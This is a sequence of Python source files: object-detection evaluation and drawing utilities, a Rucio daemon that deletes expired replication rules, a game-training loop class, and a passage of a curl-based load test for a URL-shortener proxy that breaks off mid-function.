# expand tlwh box by width portion (0.1) and height
left, top, width, height = tlwh
expanded_width = width * (1.0 + w_p)
expanded_height = height * (1.0 + h_p)
new_left = left - width * w_p * 0.5
new_top = top - height * h_p * 0.5
return [new_left, new_top, expanded_width, expanded_height]
def parse_meva_clip_name(clip_name):
# assuming no appendix
date, start_time, end_time, location, camera = clip_name.split(".")
return date, end_time.split("-")[0]
class Summary:
def __init__(self):
self.lines = []
def add(self, string, print_it=True):
if print_it:
print(string)
self.lines.append(string)
def writeTo(self, path):
with open(path, "w") as f:
f.writelines("%s" % ("\n".join(self.lines)))
def grouper(l, n, fillvalue=None):
# given a list and n(batch_size), devide list into n sized chunks
# last one will fill None
args = [iter(l)] * n
if sys.version_info > (3, 0):
out = itertools.zip_longest(*args, fillvalue=None)
else:
out = itertools.izip_longest(*args, fillvalue=None)
out = list(out)
return out
# simple FIFO class for moving average computation
class FIFO_ME:
def __init__(self, N):
self.N = N
self.lst = []
assert N > 0
def put(self, val):
if val is None:
return None
self.lst.append(val)
if len(self.lst) > self.N:
self.lst.pop(0)
return 1
def me(self):
if not self.lst:
return None
return np.mean(self.lst)
# return the gpu utilization at the moment. float between 0~1.0
# tested for nvidia 384.90
# gpuid_range is a tuple of (gpu_startid, gpu_num)
def parse_nvidia_smi(gpuid_range):
nvi_out = commands.getoutput("nvidia-smi")
# ['| 0% 41C P8 9W / 180W | 26MiB / 8117MiB | 0% Default |']
gpu_info_blocks = get_gpu_info_block(nvi_out)[
gpuid_range[0] : (gpuid_range[0] + gpuid_range[1])
]
# num_gpu = len(gpu_info_blocks) # the ones we care
# all are a list of
temps = [
float(info_block.strip().strip("|").split()[1].strip("C"))
for info_block in gpu_info_blocks
]
utilizations = [
float(info_block.strip().strip("|").split()[-2].strip("%")) / 100.0
for info_block in gpu_info_blocks
]
# in mb
memories = [
float(info_block.strip().strip("|").split()[-6].strip(" MiB"))
for info_block in gpu_info_blocks
]
return temps, utilizations, memories
class PerformanceLogger(object):
def __init__(self, gpu_ids, interval=10.0):
self.gpu_ids = gpu_ids
self.interval = interval # in seconds
self.logs = {
"cpu_utilization": [],
"gpu_utilization": [],
"gpu_temperature": [],
"gpu_memory": [],
"ram_used": [],
"timing": [],
}
self.mb = 1024 * 1024.0
# can use process since we need shared memory for the logs
self.performance_check_thread = threading.Thread(target=self.log_util_fn)
self.performance_check_thread.daemon = True
def log_util_fn(self):
while True:
time.sleep(self.interval)
self.logs["timing"].append(time.time())
gpu_temps, gpu_utils, gpu_mems = parse_nvidia_smi(self.gpu_ids)
# https://psutil.readthedocs.io/en/latest/#psutil.cpu_percent
cpu_percent = psutil.cpu_percent(interval=0.1, percpu=False) # already %
ram_used = psutil.virtual_memory().used / self.mb # in MB
# save the average of this instant
self.logs["gpu_utilization"].append(np.mean(gpu_utils) * 100.0)
self.logs["gpu_temperature"].append(np.mean(gpu_temps))
self.logs["gpu_memory"].append(np.mean(gpu_mems))
self.logs["cpu_utilization"].append(cpu_percent)
self.logs["ram_used"].append(ram_used)
def start(self):
self.performance_check_thread.start()
def end(self):
self.performance_check_thread.join(0)
def get_gpu_info_block(nvi_out):
nvi_out = nvi_out.split("\n")
start_idx = -1
end_idx = -1
for i, line in enumerate(nvi_out):
if line.startswith("|====="):
start_idx = i + 1
break
for i, line in enumerate(nvi_out):
if line.startswith(" "):
end_idx = i
break
assert (start_idx >= 0) and (end_idx >= 0), nvi_out
# each gpu contains two line
gpu_info_blocks = []
for i in range(start_idx, end_idx, 3):
# nvi_out[i]:"| 0 GeForce GTX TIT... Off | 00000000:01:00.0 Off |
# N/A |"
# nvi_out[i+1]: "| 47% 81C P2 87W / 250W | 10547MiB / 12205MiB |
# 0% Default |"
gpu_info_blocks.append(nvi_out[i + 1])
return gpu_info_blocks
def nms_wrapper(final_boxes, final_probs, config):
# in this mode,
# final_boxes would be [num_class-1, num_prop, 4]
# final_probs would be [num_class-1, num_prop]
# 1. make one dets matrix
# [num_class-1, num_prop, 5]
dets = np.concatenate([final_boxes, np.expand_dims(final_probs, axis=-1)], axis=-1)
final_boxes, final_probs, final_labels = [], [], []
for c in range(dets.shape[0]): # 0- num_class-1
this_dets = dets[c]
# hard limit of confident score
select_ids = this_dets[:, -1] > config.result_score_thres
this_dets = this_dets[select_ids, :]
classid = c + 1 # first one is BG
# 2. nms, get [K, 5]
# if config.use_soft_nms:
# keep = soft_nms(this_dets)
# else:
keep = nms(this_dets, config.fastrcnn_nms_iou_thres)
this_dets = this_dets[keep, :]
# sort the output and keep only k for each class
boxes = this_dets[:, :4] # [K,4]
probs = this_dets[:, 4] # [K]
final_boxes.extend(boxes)
final_probs.extend(probs)
final_labels.extend([classid for i in range(len(probs))])
# they could be empty, for empty scenes when filtered using result_score_thres
if not final_boxes:
return [], [], []
final_boxes_all = np.array(final_boxes, dtype="float")
final_probs_all = np.array(final_probs)
final_labels_all = np.array(final_labels)
# keep max result across all class
ranks = np.argsort(final_probs)[::-1]
final_boxes = final_boxes_all[ranks, :][: config.result_per_im]
final_probs = final_probs_all[ranks][: config.result_per_im]
final_labels = final_labels_all[ranks][: config.result_per_im]
return final_boxes, final_labels, final_probs
class Dataset:
# data should be
"""
data = {"imgs":[],"ids":[],"gt":[]}
"""
def __init__(self, data, add_gt=False, valid_idxs=None):
self.data = data
self.add_gt = add_gt
self.valid_idxs = (
range(len(next(iter(self.data.values()))))
if valid_idxs is None
else valid_idxs
)
self.num_examples = len(self.valid_idxs) # get one var "x" and get the len
def get_by_idxs(self, idxs):
out = defaultdict(list) # so the initial value is a list
for key, val in self.data.items():
out[key].extend(val[idx] for idx in idxs) # extend with one whole list
return out
# retrun num_batchs , each batch is batch_size.
# if cap, will make sure the total sample used <= dataset size
def get_batches(self, batch_size, num_batches, shuffle=True, cap=False):
num_batches_per_epoch = int(math.ceil(self.num_examples / float(batch_size)))
if cap and (num_batches > num_batches_per_epoch):
num_batches = num_batches_per_epoch
# this may be zero
num_epochs = int(math.ceil(num_batches / float(num_batches_per_epoch)))
# shuflle
if shuffle:
# this is the list of shuffled all idxs
random_idxs = random.sample(self.valid_idxs, len(self.valid_idxs))
# all batch idxs for one epoch
random_grouped = lambda: list(grouper(random_idxs, batch_size))
grouped = random_grouped
else:
raw_grouped = lambda: list(grouper(self.valid_idxs, batch_size))
grouped = raw_grouped
# all batches idxs from multiple epochs
batch_idxs_iter = itertools.chain.from_iterable(
grouped() for _ in range(num_epochs)
)
# so how all the epoch is order is fixed here
for _ in range(num_batches):
# so in the end batch, the None will not included
batch_idxs = tuple(i for i in next(batch_idxs_iter) if i is not None)
# a dict of {"x":[],"y":[],"ids":[]...}
# batch_idxs could be str?
# batch_data = self.get_by_idxs(batch_idxs)
# yield batch_idxs,Dataset(batch_data) # make a new Dataset object
# will continue next time it is called, i.e., in the next loop
# modififiled for multi gpu setting, each image has one Dataset Object
batch_datas = [self.get_by_idxs([idx]) for idx in batch_idxs]
# print(batch_idxs
# print(batch_datas
yield batch_idxs, [Dataset(batch_data) for batch_data in batch_datas]
# helper function for eval
def gather_dt(
boxes,
probs,
labels,
eval_target,
targetid2class,
tococo=False,
coco_class_names=None,
):
target_dt_boxes = {one: [] for one in eval_target.keys()}
for box, prob, label in zip(boxes, probs, labels):
# coco box
box[2] -= box[0]
box[3] -= box[1]
assert label > 0
if tococo:
cat_name = coco_class_names[label]
else:
# diva class trained from scratch
cat_name = targetid2class[label]
target_class = None
if tococo:
for t in eval_target:
if cat_name in eval_target[t]:
target_class = t
else:
if cat_name in eval_target:
target_class = cat_name
if target_class is None: # box from other class of mscoco/diva
continue
prob = float(round(prob, 4))
# box = list(map(lambda x:float(round(x, 2)),box))
box = [float(round(x, 2)) for x in box]
target_dt_boxes[target_class].append((box, prob))
return target_dt_boxes
def aggregate_eval(e, maxDet=100):
aps = {}
ars = {}
for catId in e:
e_c = e[catId]
# put all detection scores from all image together
dscores = np.concatenate([e_c[imageid]["dscores"][:maxDet] for imageid in e_c])
# sort
inds = np.argsort(-dscores, kind="mergesort")
# dscores_sorted = dscores[inds]
# put all detection annotation together based on the score sorting
dm = np.concatenate([e_c[imageid]["dm"][:maxDet] for imageid in e_c])[inds]
num_gt = np.sum([e_c[imageid]["gt_num"] for imageid in e_c])
# here the average precision should also put the unmatched ground truth
# as detection box with lowest score
# aps[catId] = computeAP(dm)
aps[catId] = computeAP_v2(dm, num_gt)
ars[catId] = computeAR_2(dm, num_gt)
return aps, ars
def weighted_average(aps, ars, eval_target_weight=None):
if eval_target_weight is not None:
average_ap = sum([aps[class_] * eval_target_weight[class_] for class_ in aps])
average_ar = sum([ars[class_] * eval_target_weight[class_] for class_ in ars])
else:
average_ap = sum(aps.values()) / float(len(aps))
average_ar = sum(ars.values()) / float(len(ars))
return average_ap, average_ar
def gather_gt(anno_boxes, anno_labels, eval_target, targetid2class):
gt_boxes = {one: [] for one in eval_target.keys()}
for box, label in zip(anno_boxes, anno_labels):
label = targetid2class[label]
if label in eval_target:
# gt_box = list(map(lambda x:float(round(x,1)),box))
gt_box = [float(round(x, 1)) for x in box]
# gt_box is in (x1,y1,x2,y2)
# convert to coco box
gt_box[2] -= gt_box[0]
gt_box[3] -= gt_box[1]
gt_boxes[label].append(gt_box)
return gt_boxes
# change e in place
def match_dt_gt(e, imgid, target_dt_boxes, gt_boxes, eval_target):
for target_class in eval_target.keys():
# if len(gt_boxes[target_class]) == 0:
# continue
target_dt_boxes[target_class].sort(key=operator.itemgetter(1), reverse=True)
d = [box for box, prob in target_dt_boxes[target_class]]
dscores = [prob for box, prob in target_dt_boxes[target_class]]
g = gt_boxes[target_class]
# len(D), len(G)
dm, gm = match_detection(
d, g, cocomask.iou(d, g, [0 for _ in range(len(g))]), iou_thres=0.5
)
e[target_class][imgid] = {"dscores": dscores, "dm": dm, "gt_num": len(g)}
# for activity boxes
def gather_act_singles(actsingleboxes, actsinglelabels, topk):
single_act_boxes = []
single_act_labels = []
single_act_probs = []
# [K,num_act_class]
# descending order
sorted_prob_single = np.argsort(actsinglelabels, axis=-1)[:, ::-1]
BG_ids = sorted_prob_single[:, 0] == 0 # [K] of bool
for j in range(len(actsinglelabels)):
if BG_ids[j]:
continue
labelIds = [sorted_prob_single[j, k] for k in range(topk)]
# ignore BG class # or ignore everything after BG class?
this_labels = [lid for lid in labelIds if lid != 0]
this_probs = [actsinglelabels[j, lid] for lid in this_labels]
this_boxes = [actsingleboxes[j] for _ in range(len(this_labels))]
single_act_probs.extend(this_probs)
single_act_labels.extend(this_labels)
single_act_boxes.extend(this_boxes)
return single_act_boxes, single_act_labels, single_act_probs
def match_detection(d, g, ious, iou_thres=0.5):
D = len(d)
G = len(g)
# < 0 to note it is not matched, once matched will be the index of the d
gtm = -np.ones((G)) # whether a gt box is matched
dtm = -np.ones((D))
# for each detection bounding box (ranked), will get the best IoU
# matched ground truth box
for didx, _ in enumerate(d):
iou = iou_thres # the matched iou
m = -1 # used to remember the matched gidx
for gidx, _ in enumerate(g):
# if this gt box is matched
if gtm[gidx] >= 0:
continue
# the di,gi pair doesn"t have the required iou
# or not better than before
if ious[didx, gidx] < iou:
continue
# got one
iou = ious[didx, gidx]
m = gidx
if m == -1:
continue
gtm[m] = didx
dtm[didx] = m
return dtm, gtm
def evalcoco(res, annofile, add_mask=False):
coco = COCO(annofile)
cocoDt = coco.loadRes(res)
cocoEval = COCOeval(coco, cocoDt, "bbox")
cocoEval.evaluate()
cocoEval.accumulate()
cocoEval.summarize()
if add_mask:
cocoEval = COCOeval(coco, cocoDt, "segm")
cocoEval.evaluate()
cocoEval.accumulate()
cocoEval.summarize()
# 给定秒数,换成 H M S
def sec2time(secs):
# return strftime("%H:%M:%S",time.gmtime(secs)) # doesnt support millisec """
m, s = divmod(secs, 60)
# print(m,s
h, m = divmod(m, 60)
if s >= 10.0:
return "%02d:%02d:%.3f" % (h, m, s)
else:
return "%02d:%02d:0%.3f" % (h, m, s)
def get_op_tensor_name(name):
"""
Will automatically determine if ``name`` is a tensor name (ends with ":x")
or a op name.
If it is an op name, the corresponding tensor name is assumed to be
``op_name + ":0"``.
Args:
name(str): name of an op or a tensor
Returns:
tuple: (op_name, tensor_name)
"""
if len(name) >= 3 and name[-2] == ":":
return name[:-2], name
else:
return name, name + ":0"
# from tensorpack
def draw_boxes(im, boxes, labels=None, colors=None):
"""
Args:
im (np.ndarray): a BGR image in range [0,255]. It will not be modified.
boxes (np.ndarray or list[BoxBase]): If an ndarray,
must be of shape Nx4 where the second dimension is [x1, y1, x2, y2].
labels: (list[str] or None)
color: a 3-tuple (in range [0, 255]). By default will choose automatically.
Returns:
np.ndarray: a new image.
"""
FONT = cv2.FONT_HERSHEY_SIMPLEX
FONT_SCALE = 0.4
if isinstance(boxes, list):
arr = np.zeros((len(boxes), 4), dtype="int32")
for idx, b in enumerate(boxes):
assert isinstance(b, BoxBase), b
arr[idx, :] = [int(b.x1), int(b.y1), int(b.x2), int(b.y2)]
boxes = arr
else:
boxes = boxes.astype("int32")
if labels is not None:
assert len(labels) == len(boxes), "{} != {}".format(len(labels), len(boxes))
areas = (boxes[:, 2] - boxes[:, 0] + 1) * (boxes[:, 3] - boxes[:, 1] + 1)
sorted_inds = np.argsort(-areas) # draw large ones first
assert areas.min() > 0, areas.min()
# allow equal, because we are not very strict about rounding error here
assert (
boxes[:, 0].min() >= 0
and boxes[:, 1].min() >= 0
and boxes[:, 2].max() <= im.shape[1]
and boxes[:, 3].max() <= im.shape[0]
), "Image shape: {}\n Boxes:\n{}".format(str(im.shape), str(boxes))
im = im.copy()
COLOR_DIFF_WEIGHT = np.asarray((3, 4, 2), dtype="int32")
COLOR_CANDIDATES = PALETTE_RGB[:, ::-1]
if im.ndim == 2 or (im.ndim == 3 and im.shape[2] == 1):
im = cv2.cvtColor(im, cv2.COLOR_GRAY2BGR)
for i in sorted_inds:
box = boxes[i, :]
best_color = colors[i] if colors is not None else (255, 0, 0)
if labels is not None:
label = labels[i]
# find the best placement for the text
((linew, lineh), _) = cv2.getTextSize(label, FONT, FONT_SCALE, 1)
bottom_left = [box[0] + 1, box[1] - 0.3 * lineh]
top_left = [box[0] + 1, box[1] - 1.3 * lineh]
if top_left[1] < 0: # out of image
top_left[1] = box[3] - 1.3 * lineh
bottom_left[1] = box[3] - 0.3 * lineh
textbox = IntBox(
int(top_left[0]),
int(top_left[1]),
int(top_left[0] + linew),
int(top_left[1] + lineh),
)
textbox.clip_by_shape(im.shape[:2])
cv2.putText(
im, label, (textbox.x1, textbox.y2), FONT, FONT_SCALE, color=best_color
) # , lineType=cv2.LINE_AA)
cv2.rectangle(
im, (box[0], box[1]), (box[2], box[3]), color=best_color, thickness=1
)
return im
# a lists of floats, if < 0 means false positive, otherwise true positive
# assume lists is sorted
def computeAP(lists):
# 相关的总数
rels = 0
# 当前排名
rank = 0
# AP 分数
score = 0.0
for one in lists:
rank += 1
# 是相关的
if one >= 0:
rels += 1
score += rels / float(rank)
if rels != 0:
score /= float(rels)
return score
def computeAP_v2(lists, total_gt):
# 相关的总数
rels = 0
# 当前排名
rank = 0
# AP 分数
score = 0.0
for one in lists:
rank += 1
# 是相关的
if one >= 0:
rels += 1
score += rels / float(rank)
if total_gt != 0:
score /= float(total_gt)
return score
# given a fixed number (recall_k) of detection,
# assume d is sorted, and each d should be < 0
# if false positive, true positive d[i] == gidx
def computeAR(d, g, recall_k):
TrueDetections = len([one for one in d[:recall_k] if one >= 0])
num_gt = len(g)
if len(g) > recall_k:
num_gt = recall_k
if not g:
return 1.0
else:
return TrueDetections / float(num_gt)
def computeAR_2(d, num_gt):
true_positives = len([one for one in d if one >= 0])
if num_gt == 0:
return 1.0
else:
return true_positives / float(num_gt)
PALETTE_HEX = [
"#000000",
"#FFFF00",
"#1CE6FF",
"#FF34FF",
"#FF4A46",
"#008941",
"#006FA6",
"#FFDBE5",
"#7A4900",
"#0000A6",
"#63FFAC",
"#B79762",
"#004D43",
"#8FB0FF",
"#5A0007",
"#809693",
"#FEFFE6",
"#1B4400",
"#4FC601",
"#3B5DFF",
"#4A3B53",
"#61615A",
"#BA0900",
"#6B7900",
"#00C2A0",
"#FFAA92",
"#FF90C9",
"#B903AA",
"#DDEFFF",
"#000035",
"#7B4F4B",
"#A1C299",
"#300018",
"#0AA6D8",
"#013349",
"#372101",
"#FFB500",
"#C2FFED",
"#A079BF",
"#CC0744",
"#C0B9B2",
"#C2FF99",
"#00489C",
"#6F0062",
"#0CBD66",
"#EEC3FF",
"#456D75",
"#B77B68",
"#7A87A1",
"#885578",
"#FAD09F",
"#FF8A9A",
"#D157A0",
"#BEC459",
"#456648",
"#0086ED",
"#34362D",
"#B4A8BD",
"#00A6AA",
"#452C2C",
"#636375",
"#A3C8C9",
"#FF913F",
"#575329",
"#00FECF",
"#B05B6F",
"#8CD0FF",
"#3B9700",
"#04F757",
"#C8A1A1",
"#7900D7",
"#A77500",
"#6367A9",
"#A05837",
"#6B002C",
"#772600",
"#D790FF",
"#549E79",
"#FFF69F",
"#201625",
"#72418F",
"#BC23FF",
"#99ADC0",
"#3A2465",
"#5B4534",
"#FDE8DC",
"#404E55",
"#0089A3",
"#CB7E98",
"#A4E804",
"#324E72",
"#83AB58",
"#001C1E",
"#D1F7CE",
"#004B28",
"#C8D0F6",
"#A3A489",
"#806C66",
"#BF5650",
"#E83000",
"#66796D",
"#DA007C",
"#FF1A59",
"#8ADBB4",
"#1E0200",
"#C895C5",
"#320033",
"#FF6832",
"#66E1D3",
"#CFCDAC",
"#D0AC94",
"#A30059",
"#997D87",
"#FF2F80",
"#D16100",
"#00846F",
"#001E09",
"#788D66",
"#886F4C",
"#938A81",
"#1E6E00",
"#9B9700",
"#922329",
"#6A3A4C",
"#222800",
"#5B4E51",
"#7ED379",
"#012C58",
]
def _parse_hex_color(s):
r = int(s[1:3], 16)
g = int(s[3:5], 16)
b = int(s[5:7], 16)
return (r, g, b)
PALETTE_RGB = np.asarray(list(map(_parse_hex_color, PALETTE_HEX)), dtype="int32")
# conver from COCO format (x,y,w,h) to (x1,y1,x2,y2)
def box_wh_to_x1x2(box):
return [box[0], box[1], box[0] + box[2], box[1] + box[3]]
class BoxBase(object):
__slots__ = ["x1", "y1", "x2", "y2"]
def __init__(self, x1, y1, x2, y2):
self.x1 = x1
self.y1 = y1
self.x2 = x2
self.y2 = y2
def copy(self):
new = type(self)()
for i in self.__slots__:
setattr(new, i, getattr(self, i))
return new
def __str__(self):
return "{}(x1={}, y1={}, x2={}, y2={})".format(
type(self).__name__, self.x1, self.y1, self.x2, self.y2
)
__repr__ = __str__
def area(self):
return self.w * self.h
def is_box(self):
return self.w > 0 and self.h > 0
class IntBox(BoxBase):
def __init__(self, x1, y1, x2, y2):
for k in [x1, y1, x2, y2]:
assert isinstance(k, int)
super(IntBox, self).__init__(x1, y1, x2, y2)
@property
def w(self):
return self.x2 - self.x1 + 1
@property
def h(self):
return self.y2 - self.y1 + 1
def is_valid_box(self, shape):
"""
Check that this rect is a valid bounding box within this shape.
Args:
shape: int [h, w] or None.
Returns:
bool
"""
if min(self.x1, self.y1) < 0:
return False
if min(self.w, self.h) <= 0:
return False
if self.x2 >= shape[1]:
return False
if self.y2 >= shape[0]:
return False
return True
def clip_by_shape(self, shape):
"""
Clip xs and ys to be valid coordinates inside shape
Args:
shape: int [h, w] or None.
"""
self.x1 = np.clip(self.x1, 0, shape[1] - 1)
self.x2 = np.clip(self.x2, 0, shape[1] - 1)
self.y1 = np.clip(self.y1, 0, shape[0] - 1)
self.y2 = np.clip(self.y2, 0, shape[0] - 1)
def roi(self, img):
assert self.is_valid_box(img.shape[:2]), "{} vs {}".format(self, img.shape[:2])
return img[self.y1 : self.y2 + 1, self.x1 : self.x2 + 1]
|
cleaner.py
|
# Copyright 2013-2018 CERN for the benefit of the ATLAS collaboration.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Martin Barisits <martin.barisits@cern.ch>, 2013-2016
# - Mario Lassnig <mario.lassnig@cern.ch>, 2013-2015
# - Cedric Serfon <cedric.serfon@cern.ch>, 2013
# - Vincent Garonne <vgaronne@gmail.com>, 2014-2018
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - Brandon White <bjwhite@fnal.gov>, 2019-2020
# - Thomas Beermann <thomas.beermann@cern.ch>, 2020
#
# PY3K COMPATIBLE
"""
Judge-Cleaner is a daemon to clean expired replication rules.
"""
import logging
import os
import socket
import sys
import threading
import time
import traceback
from copy import deepcopy
from datetime import datetime, timedelta
from re import match
from random import randint
from sqlalchemy.exc import DatabaseError
from rucio.common.config import config_get
from rucio.common.exception import DatabaseException, UnsupportedOperation, RuleNotFound
from rucio.core.heartbeat import live, die, sanity_check
from rucio.core.rule import delete_rule, get_expired_rules
from rucio.core.monitor import record_counter
from rucio.db.sqla.util import get_db_time
graceful_stop = threading.Event()
logging.basicConfig(stream=sys.stdout,
level=getattr(logging,
config_get('common', 'loglevel',
raise_exception=False,
default='DEBUG').upper()),
format='%(asctime)s\t%(process)d\t%(levelname)s\t%(message)s')
def rule_cleaner(once=False):
"""
Main loop to check for expired replication rules
"""
hostname = socket.gethostname()
pid = os.getpid()
current_thread = threading.current_thread()
paused_rules = {} # {rule_id: datetime}
# Make an initial heartbeat so that all judge-cleaners have the correct worker number on the next try
executable = 'judge-cleaner'
live(executable=executable, hostname=hostname, pid=pid, thread=current_thread)
graceful_stop.wait(1)
while not graceful_stop.is_set():
try:
# heartbeat
heartbeat = live(executable=executable, hostname=hostname, pid=pid, thread=current_thread)
start = time.time()
# Refresh paused rules
iter_paused_rules = deepcopy(paused_rules)
for key in iter_paused_rules:
if datetime.utcnow() > paused_rules[key]:
del paused_rules[key]
rules = get_expired_rules(total_workers=heartbeat['nr_threads'],
worker_number=heartbeat['assign_thread'],
limit=200,
blacklisted_rules=[key for key in paused_rules])
logging.debug('rule_cleaner[%s/%s] index query time %f fetch size is %d' % (heartbeat['assign_thread'], heartbeat['nr_threads'], time.time() - start, len(rules)))
if not rules and not once:
logging.debug('rule_cleaner[%s/%s] did not get any work (paused_rules=%s)' % (heartbeat['assign_thread'], heartbeat['nr_threads'], str(len(paused_rules))))
graceful_stop.wait(60)
else:
for rule in rules:
rule_id = rule[0]
rule_expression = rule[1]
logging.info('rule_cleaner[%s/%s]: Deleting rule %s with expression %s' % (heartbeat['assign_thread'], heartbeat['nr_threads'], rule_id, rule_expression))
if graceful_stop.is_set():
break
try:
start = time.time()
delete_rule(rule_id=rule_id, nowait=True)
logging.debug('rule_cleaner[%s/%s]: deletion of %s took %f' % (heartbeat['assign_thread'], heartbeat['nr_threads'], rule_id, time.time() - start))
except (DatabaseException, DatabaseError, UnsupportedOperation) as e:
if match('.*ORA-00054.*', str(e.args[0])):
paused_rules[rule_id] = datetime.utcnow() + timedelta(seconds=randint(600, 2400))
record_counter('rule.judge.exceptions.LocksDetected')
logging.warning('rule_cleaner[%s/%s]: Locks detected for %s' % (heartbeat['assign_thread'], heartbeat['nr_threads'], rule_id))
elif match('.*QueuePool.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
elif match('.*ORA-03135.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
else:
logging.error(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
except RuleNotFound as e:
pass
except (DatabaseException, DatabaseError) as e:
if match('.*QueuePool.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
elif match('.*ORA-03135.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
else:
logging.critical(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
except Exception as e:
logging.critical(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
if once:
break
die(executable=executable, hostname=hostname, pid=pid, thread=current_thread)
def stop(signum=None, frame=None):
"""
Graceful exit.
"""
graceful_stop.set()
def run(once=False, threads=1):
"""
Starts up the Judge-Clean threads.
"""
client_time, db_time = datetime.utcnow(), get_db_time()
max_offset = timedelta(hours=1, seconds=10)
if type(db_time) is datetime:
if db_time - client_time > max_offset or client_time - db_time > max_offset:
logging.critical('Offset between client and db time too big. Stopping Cleaner')
return
executable = 'judge-cleaner'
hostname = socket.gethostname()
sanity_check(executable=executable, hostname=hostname)
if once:
rule_cleaner(once)
else:
logging.info('Cleaner starting %s threads' % str(threads))
threads = [threading.Thread(target=rule_cleaner, kwargs={'once': once}) for i in range(0, threads)]
[t.start() for t in threads]
# Interruptible joins require a timeout.
while threads[0].is_alive():
[t.join(timeout=3.14) for t in threads]
|
single_process.py
|
# Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
from ..args_provider import ArgsProvider
import tqdm
class SingleProcessRun:
def __init__(self):
''' Initialization for SingleProcessRun. Accepted arguments:
``num_minibatch``,
``num_episode``,
``tqdm``
'''
self.args = ArgsProvider(
call_from = self,
define_args = [
("num_minibatch", 5000),
("num_episode", 10000),
("tqdm", dict(action="store_true")),
]
)
def setup(self, GC, episode_start=None, episode_summary=None):
''' Setup for SingleProcessRun.
Args:
GC(`GameContext`): Game Context
episode_start(func): operations to perform before each episode
episode_summary(func): operations to summarize after each epidsode
'''
self.GC = GC
self.episode_summary = episode_summary
self.episode_start = episode_start
def run(self):
''' Main training loop. Initialize Game Context and looping the required episodes.
Call episode_start and episode_summary before and after each episode if necessary.
Visualize with a progress bar if ``tqdm`` is set.
Print training stats after each episode.
In the end, print summary for game context and stop it.
'''
self.GC.Start()
args = self.args
for k in range(args.num_episode):
if self.episode_start is not None:
self.episode_start(k)
if args.tqdm:
iterator = tqdm.trange(args.num_minibatch, ncols=50)
else:
iterator = range(args.num_minibatch)
for i in iterator:
self.GC.Run()
if self.episode_summary is not None:
self.episode_summary(k)
self.GC.PrintSummary()
self.GC.Stop()
def run_multithread(self):
''' Start training in a multithreaded environment '''
def train_thread():
args = self.args
for i in range(args.num_episode):
for k in range(args.num_minibatch):
if self.episode_start is not None:
self.episode_start(k)
if k % 500 == 0:
print("Receive minibatch %d/%d" % (k, args.num_minibatch))
self.GC.RunGroup("train")
# Print something.
self.episode_summary(i)
def actor_thread():
while True:
self.GC.RunGroup("actor")
self.GC.Start()
# Start the two threads.
train_th = threading.Thread(target=train_thread)
actor_th = threading.Thread(target=actor_thread)
train_th.start()
actor_th.start()
train_th.join()
actor_th.join()
|
Tests.py
|
#!/usr/bin/python3
import random, string, subprocess
from subprocess import check_output
from subprocess import Popen, PIPE
import random
import time
import logging
import threading
import os
import datetime
import configparser
import requests
mainProxyHost = "10.11.12.115"
mainProxyPort = 80
shortList = []
# Letter range
random.seed(30)
#------- UTILITY FUNCTIONS ------
# generates the shorts
def generateShorts(start, end ,total):
global shortList
shortList = []
for i in range(total):
s = str(random.randint(start, end))
shortList.append(s)
# gets time in milliseconds
def getMillSeconds(start, end):
time_diff = (end - start)
execution_time = time_diff.total_seconds() * 1000
return execution_time
#------- SINGLE TEST FUNCTIONS ------
def singlePutRequestTest():
print("\nSINGLE REQUEST TIME FOR PUT")
print("\tAssuming this is a valid request and will go through")
shortResource = "hello2"
longResource = "world"
request = "http://" + mainProxyHost + ":" + str(mainProxyPort) + "/?short="+ shortResource+"&long="+longResource
p = Popen(['curl', '-X', "PUT", request], stdin=PIPE, stdout=PIPE, stderr=PIPE)
start = datetime.datetime.now()
output, err = p.communicate(b"input data that is passed to subprocess' stdin")
end = datetime.datetime.now()
print("singlePutRequest Execution time: %d", getMillSeconds(start, end))
print(output)
def singleGetRequestTest():
print("\nSINGLE REQUEST TIME FOR GET")
print("\tAssuming this is a valid request and will go through")
shortResource = "hello"
request = "http://" + mainProxyHost + ":" + str(mainProxyPort) + "/" + shortResource
p = Popen(['curl','-X', 'GET' ,request], stdin=PIPE, stdout=PIPE, stderr=PIPE)
start = datetime.datetime.now()
output, err = p.communicate(b"input data that is passed to subprocess' stdin")
end = datetime.datetime.now()
logging.info("singleGetRequestTest Execution Time: %d", getMillSeconds(start, end))
print(output)
#------- STRESS TEST FUNCTIONS ------
def stressPutRequest():
print("\nSTRESS REQUEST TIME FOR PUT SINGLE THEREAD: " + str(len(shortList)) + " REQUESTS" )
print("\tAssuming these are valid request and will go through")
start = datetime.datetime.now()
for short in shortList:
longResource = "world"
request = "curl -X PUT 'http://{}:{}/?short={}&long={}'".format(mainProxyHost, str(mainProxyPort), short, longResource)
subprocess.call(request, shell=True)
end = datetime.datetime.now()
print("StressPutRequest Test Execution Time: %dms", getMillSeconds(start, end))
print(end - start)
def stressGetRequest():
logging.info("\nSTRESS REQUEST TIME FOR PUT SINGLE THEREAD: " + str(len(shortList)) + " REQUESTS" )
logging.info("\tAssuming these are valid request and will go through")
start = datetime.datetime.now()
for short in shortList:
request = "curl -X GET 'http://{}:{}/{}'".format(mainProxyHost, str(mainProxyPort), short)
subprocess.call(request, shell=True)
end = datetime.datetime.now()
print("Total Execution time: %d ms", getMillSeconds(start, end))
# ------ Threaded Put Test -------------
def thread_function_Put(start, end):
longResource = "world"
i = start
while i < end:
